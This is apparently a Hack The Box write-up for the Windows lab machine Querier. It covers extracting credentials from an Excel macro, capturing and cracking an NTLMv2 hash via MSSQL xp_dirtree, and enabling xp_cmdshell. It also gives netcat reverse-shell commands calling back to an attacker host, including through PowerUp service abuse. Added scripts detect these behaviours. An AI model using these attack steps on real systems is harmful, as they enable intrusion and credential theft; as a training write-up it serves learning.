Pentest Everything
Querier

https://www.hackthebox.eu/home/machines/profile/175

Last updated 2 years ago

Nmap

We start by quickly scanning all ports with nmap 10.10.10.125 -p-. Once this has finished we take the discovered ports (ignoring the high-numbered RPC ports) and scan them more intensively, which gives the following results:

nmap -p- 10.10.10.125

PORT      STATE SERVICE
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
445/tcp   open  microsoft-ds
1433/tcp  open  ms-sql-s
5985/tcp  open  wsman
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49668/tcp open  unknown
49669/tcp open  unknown
49670/tcp open  unknown
49671/tcp open  unknown

nmap 10.10.10.125 -p 135,139,445,1433,5985,47001  -A -T4

PORT      STATE SERVICE       VERSION
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
1433/tcp  open  ms-sql-s      Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: HTB
|   NetBIOS_Domain_Name: HTB
|   NetBIOS_Computer_Name: QUERIER
|   DNS_Domain_Name: HTB.LOCAL
|   DNS_Computer_Name: QUERIER.HTB.LOCAL
|   DNS_Tree_Name: HTB.LOCAL
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2020-10-11T09:14:54
|_Not valid after:  2050-10-11T09:14:54
|_ssl-date: 2020-10-11T09:40:25+00:00; +23s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 22s, deviation: 0s, median: 22s
| ms-sql-info: 
|   10.10.10.125:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2020-10-11T09:40:21
|_  start_date: N/A

SMB

We start by checking the SMB ports with smbclient. The -N switch connects with no password (a null session), and it works here. We can list the remote shares with smbclient -L 10.10.10.125 -N.

After finding the Reports share we can connect directly to it with the following command: smbclient \\\\10.10.10.125\\Reports -N

From here we can grab the .xlsm file in the share using the get command.

An XLSM file is a macro-enabled XLSX workbook. Like XLSX it is a ZIP container holding XML parts, with the VBA macros stored as a binary stream, vbaProject.bin. We can use binwalk with the -e switch to extract the archive to a folder.

Running the strings command on the extracted vbaProject.bin file reveals a connection string in which the Uid and Pwd fields appear to be credentials.

We can also view the macro in LibreOffice Calc to obtain the same information.
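The same extraction can be done without binwalk or strings, which also shows why the technique works. The Python below is an added example, not part of the original write-up: it builds a constructed stand-in for the workbook (a ZIP with a fake xl/vbaProject.bin containing a connection string with a made-up password), then opens it with the standard zipfile module, pulls printable runs from the macro stream the way strings(1) does, and picks out the Uid/Pwd pairs. The Server name is the box's hostname from the nmap output; the database name and password are constructed values.

```python
import io
import re
import zipfile
from typing import Dict, List

# An .xlsm is a ZIP container: the XML workbook parts plus the VBA project
# stored as a binary stream at xl/vbaProject.bin. String literals used by the
# macros survive inside that blob, which is why strings(1) finds them.


def build_sample_xlsm() -> bytes:
    """Constructed stand-in for the workbook on the Reports share (not the real file)."""
    macro_blob = (
        b"\x01\x00\x16\x00"                                    # filler bytes, as in a real OLE stream
        b"Driver={SQL Server};Server=QUERIER;Database=sales;"  # database name is made up
        b"\x00\x00"
        b"Uid=reporting;Pwd=EXAMPLE_PASSWORD;"                  # constructed password, not the box's
        b"\x00\x03"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", "<Types/>")
        zf.writestr("xl/workbook.xml", "<workbook/>")
        zf.writestr("xl/vbaProject.bin", macro_blob)
    return buf.getvalue()


def extract_strings(blob: bytes, min_len: int = 4) -> List[str]:
    """Runs of printable ASCII at least min_len long, the default rule strings(1) applies."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.group(0).decode("ascii") for m in re.finditer(pattern, blob)]


# Keys that ODBC / OLE DB connection strings use for credentials.
CRED_KEY = re.compile(r"\b(uid|user id|pwd|password)\s*=\s*([^;\s]+)", re.IGNORECASE)


def find_macro_credentials(xlsm_bytes: bytes) -> Dict[str, str]:
    """Open the workbook as a ZIP, run the strings pass over every vbaProject.bin
    and return credential-looking key/value pairs with the keys lower-cased."""
    found: Dict[str, str] = {}
    with zipfile.ZipFile(io.BytesIO(xlsm_bytes)) as zf:
        for name in zf.namelist():
            if not name.lower().endswith("vbaproject.bin"):
                continue
            for text in extract_strings(zf.read(name)):
                for key, value in CRED_KEY.findall(text):
                    found[key.lower()] = value
    return found


if __name__ == "__main__":
    sample = build_sample_xlsm()
    with zipfile.ZipFile(io.BytesIO(sample)) as zf:
        print("parts in the workbook:", zf.namelist())
    print("credential-looking strings:", find_macro_credentials(sample))
```

Pointed at a real file, read its bytes and pass them to find_macro_credentials. The search is deliberately narrow (connection-string keys only); a document review would also look at the full string list, since macros can build credentials from several pieces.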

We have obtained the following credentials:

  • Username = reporting

  • Password = PcwTWTHRwryjc$c6

We can then use Impacket's mssqlclient.py to connect to the SQL server on port 1433 with the credentials we have found. Before we do so we need to edit our hosts file so we can authenticate to MSSQL.

Add the box's hostname (QUERIER, as reported by the nmap ms-sql-ntlm-info output) to /etc/hosts.

After this has been completed we can then navigate to the directory where mssqlclient.py is installed and run the python script using the following syntax:

python mssqlclient.py  querier/reporting:'PcwTWTHRwryjc$c6'@10.10.10.125 -windows-auth

The $ in the password would otherwise be interpreted by the shell as the start of a variable reference, so the password must be wrapped in single quotation marks to pass it to the script "as is" for authentication to succeed.

From here the first thing to try is xp_cmdshell, to see whether we can get a shell. In this instance access was denied, so we need different credentials to proceed. What we can do instead is try to capture an NTLM hash by getting the SQL Server's service account to authenticate against an SMB server on our attacking machine.

When the victim connects to our server we capture the NTLMv2 challenge-response and can attempt to crack it offline with Hashcat or John the Ripper.

To start this process we need an SMB server on our attacking machine. Impacket has a script for this called smbserver.py:

python3 smbserver.py -smb2support <sharename> <sharepath>

From here we can run EXEC xp_dirtree from the MSSQL session, pointing it at the share on our attacking machine, so that the server connects back to us and we capture the NTLMv2 hash.

The above command was taken from the Medium article "How to capture MSSQL credentials with xp_dirtree, smbserver.py", which I highly recommend reading on this topic.

We can see on Kali we have caught the NTLMv2 hash.

We can save the NTLMv2 hash to a file and attempt to crack it with John the Ripper. If you are having issues with the NTLMv2 hash not loading in John or Hashcat, you may be using the latest version of Impacket, which was causing me this issue. I reached out for help on TCM's Discord channel and was advised to use Impacket 0.9.19 (I was using 0.9.21).

I was able to easily uninstall Impacket and reinstall with 0.9.21 using Dewalt's pimpmykali Python script (GitHub: Dewalt-arch/pimpmykali).

After this I was able to grab the NTLMv2 hash again and was able to successfully load it into John.

From here we can crack the hash with John using the rockyou.txt wordlist.

We now have the password "corporate568". We can log into the MSSQL server again as we did above, but this time with the mssql-svc account, whose hash we captured.

mssqlclient.py  querier/mssql-svc:'corporate568'@10.10.10.125 -windows-auth 

Running the help command we get the following output:

What we want is xp_cmdshell. It is disabled by default, so we first enable it with mssqlclient's enable_xp_cmdshell command.

After this we can execute cmd commands through SQL. Ideally we use this to obtain a proper reverse shell, which is much easier to work with. I initially tried hosting netcat on the attacking machine with Python and could not get a callback using PowerShell Invoke-WebRequest or certutil.exe.
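From the defender's side, the two MSSQL behaviours used in this write-up (an extended stored procedure handed a UNC path so that the service account authenticates outbound, and xp_cmdshell being switched on and then run) are easy to spot in recorded batch text. The script below is an added example, not part of the original post: it runs a few regex rules over constructed (login, statement) pairs of the kind a SQL Server audit or Extended Events session records. The login names, the statements and the 10.0.0.5 address are all made up for the example.

```python
import re
from typing import List, Optional, Tuple

# Constructed sample of T-SQL batch text, one (login, statement) pair per
# batch. These are made-up lines for the example, not logs from the box.
SAMPLE_BATCHES: List[Tuple[str, str]] = [
    ("reporting", "SELECT name FROM sys.databases"),
    ("reporting", "EXEC master..xp_dirtree '\\\\10.0.0.5\\share', 1, 1"),
    ("mssql-svc", "EXEC sp_configure 'show advanced options', 1; RECONFIGURE"),
    ("mssql-svc", "EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE"),
    ("mssql-svc", "EXEC xp_cmdshell 'whoami'"),
    ("app_user", "EXEC xp_fileexist 'C:\\temp\\report.xlsx'"),
]

# Extended stored procedures that make the SQL Server service account open a path.
FILE_PROCS = re.compile(r"\bxp_(?:dirtree|fileexist|subdirs)\b", re.IGNORECASE)
# A quoted UNC argument ('\\host\share...) means the path is on another
# machine, so the service account will authenticate to it over SMB.
UNC_ARG = re.compile(r"'\\\\[\w.-]+\\")
# xp_cmdshell is off by default; turning it on is itself a strong signal.
ENABLE_CMDSHELL = re.compile(r"sp_configure\s+'xp_cmdshell'\s*,\s*1\b", re.IGNORECASE)
CMDSHELL_EXEC = re.compile(r"\bxp_cmdshell\b", re.IGNORECASE)


def classify(statement: str) -> Optional[str]:
    """Tag one batch with the behaviour it shows, or None if nothing matched."""
    if ENABLE_CMDSHELL.search(statement):
        return "xp_cmdshell_enabled"
    if CMDSHELL_EXEC.search(statement):
        return "xp_cmdshell_exec"
    if FILE_PROCS.search(statement) and UNC_ARG.search(statement):
        return "unc_path_probe"
    return None


def scan(batches: List[Tuple[str, str]]) -> List[Tuple[str, str, str]]:
    """Return (login, tag, statement) for every batch that matched a rule."""
    findings = []
    for login, statement in batches:
        tag = classify(statement)
        if tag is not None:
            findings.append((login, tag, statement))
    return findings


if __name__ == "__main__":
    for login, tag, statement in scan(SAMPLE_BATCHES):
        print(f"{tag:20} login={login:10} {statement}")
```

A local path given to xp_fileexist does not fire, only a UNC one, because the interesting event is the service account being made to authenticate elsewhere. The mitigations follow directly from the rules: leave xp_cmdshell disabled, do not grant application logins like reporting the right to call the xp_ file procedures, and block outbound SMB from database servers so a coerced connection cannot leave the network.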

Instead I decided on using the smbserver.py script we used earlier. Doing this I can host the nc.exe file in the SMB share and execute it from the MSSQL server.

Move nc.exe to a preferred directory. For ease of use I moved nc.exe into the same directory in which I have smbclient.py located. Once completed, run the following command to start the SMB server again, sharing the current directory:

sudo python smbserver.py -smb2support <sharename> ./

Then start a netcat listener on the attacking machine using nc -lvp 4444.

We can now execute the following command from the MSSQL session (replacing <IP> with the attacking machine's address):

xp_cmdshell \\<IP>\shared\nc.exe -e cmd.exe <IP> 4444

We now have a reverse shell.

We can now grab the user.txt flag before moving onto Privilege escalation.

Privilege Escalation

I started with basic enumeration and found with whoami /priv that we have the SeImpersonate privilege; however, as this is a Windows Server 2019 machine I was unable to execute the exploit. On anything older than Server 2019 this is usually an easy win.

I uploaded powerup.ps1 to the SMB server and then copied it down into the Reporting directory at C:\Reporting, since we have write and execute permissions in this folder.

PowerUp's Invoke-AllChecks also picks up the SeImpersonate privilege. What we are interested in is the service 'UsoSvc', which it flags as modifiable. Running the recommended AbuseFunction with its defaults, as listed in the output, would add a new local administrator account for us.

Instead we will use the AbuseFunction to launch a netcat reverse shell. We can use the following command:

Invoke-ServiceAbuse -Name 'UsoSvc' -Command "\\10.10.14.19\shared\nc.exe -e cmd.exe 10.10.14.19 6666"

This once again runs the nc.exe from the SMB share we hosted earlier; just make sure a netcat listener is running on the attacking machine (port 6666 here) first. If done correctly this calls back as NT AUTHORITY\SYSTEM.

From here we can grab the root.txt flag.
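PowerUp reports UsoSvc because its DACL lets a low-privileged account change the service configuration, which is what Invoke-ServiceAbuse relies on. As an added example (not from the write-up or from PowerUp), the Python below parses service security descriptors in the SDDL form that sc sdshow prints and flags allow ACEs granting change-config, delete, write-DAC or write-owner rights to ordinary users. Both descriptors in it are constructed: the first is the stock layout of a Windows service, the second is a deliberately weakened one, not UsoSvc's real descriptor.

```python
import re
from typing import List, Set, Tuple

# Service DACLs as printed by "sc sdshow <service>". On a service object the
# two-letter SDDL rights mean: CC QueryConfig, DC ChangeConfig, LC QueryStatus,
# SW EnumerateDependents, RP Start, WP Stop, DT PauseContinue, LO Interrogate,
# CR UserDefinedControl, SD Delete, RC ReadControl, WD WriteDac, WO WriteOwner.
# Any of the four below lets the holder rewrite the binary path or take over
# the ACL, so they belong to administrators and SYSTEM only.
CONFIG_CONTROL_RIGHTS = {"DC", "WD", "WO", "SD"}
# The same rights when sc prints the access mask as hex instead of letters.
MASK_BITS = {"DC": 0x0002, "SD": 0x10000, "WD": 0x40000, "WO": 0x80000}
# Well-known SID aliases that stand for ordinary, non-administrative users
# (Authenticated Users, Interactive, Users, Everyone, Anonymous). Note that
# "WD" in the SID field means Everyone, unrelated to the WD right above.
LOW_PRIV_SIDS = {"AU", "IU", "BU", "WD", "AN"}
ACE_RE = re.compile(r"\(([^)]*)\)")

# Constructed samples, not the box's real descriptors.
HARDENED_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
                 "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
                 "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")
WEAK_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
             "(A;;CCDCLCSWRPWPDTLOCRRC;;;AU)")  # Authenticated Users hold DC


def parse_rights(field: str) -> Set[str]:
    """Rights field of an ACE, either two-letter tokens or a hex access mask."""
    if field.startswith("0x"):
        mask = int(field, 16)
        return {name for name, bit in MASK_BITS.items() if mask & bit}
    return {field[i:i + 2] for i in range(0, len(field), 2)}


def parse_dacl(sddl: str) -> List[Tuple[str, Set[str], str]]:
    """(ace_type, rights, sid) for each ACE in the DACL; the SACL after 'S:' is ignored."""
    dacl_part = sddl.split("S:", 1)[0]
    aces = []
    for body in ACE_RE.findall(dacl_part):
        fields = body.split(";")  # type;flags;rights;object;inherit_object;sid
        if len(fields) < 6:
            continue
        aces.append((fields[0], parse_rights(fields[2]), fields[5]))
    return aces


def weak_service_aces(sddl: str) -> List[Tuple[str, List[str]]]:
    """Allow ACEs that hand a low-privileged principal control over the service config."""
    findings = []
    for ace_type, rights, sid in parse_dacl(sddl):
        granted = sorted(rights & CONFIG_CONTROL_RIGHTS)
        if ace_type == "A" and granted and sid in LOW_PRIV_SIDS:
            findings.append((sid, granted))
    return findings


if __name__ == "__main__":
    for label, sddl in (("hardened", HARDENED_SDDL), ("weak", WEAK_SDDL)):
        print(label, weak_service_aces(sddl) or "no low-privileged control rights")
```

Run it over the sc sdshow output of every service on a build; any finding is a service that should have its DACL tightened so only BA and SY keep DC/WD/WO/SD. Custom group SIDs (S-1-5-21-...) are not in the alias set and must be resolved to their group before the same test applies to them.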

Links from the original post:

  • How to capture MSSQL credentials with xp_dirtree, smbserver.py (Medium)

  • GitHub - Dewalt-arch/pimpmykali: Kali Linux Fixes for Newly Imported VM's

[Screenshots from the original post, not reproduced here: Using binwalk; Using strings on the .bin file; LibreOffice Calc; running smbserver.py; Captured NTLM hash; Running John against the hash; logging in with the mssql-svc account; command example; netcat on port 4444; Copying powerup.ps1 from the SMB server.]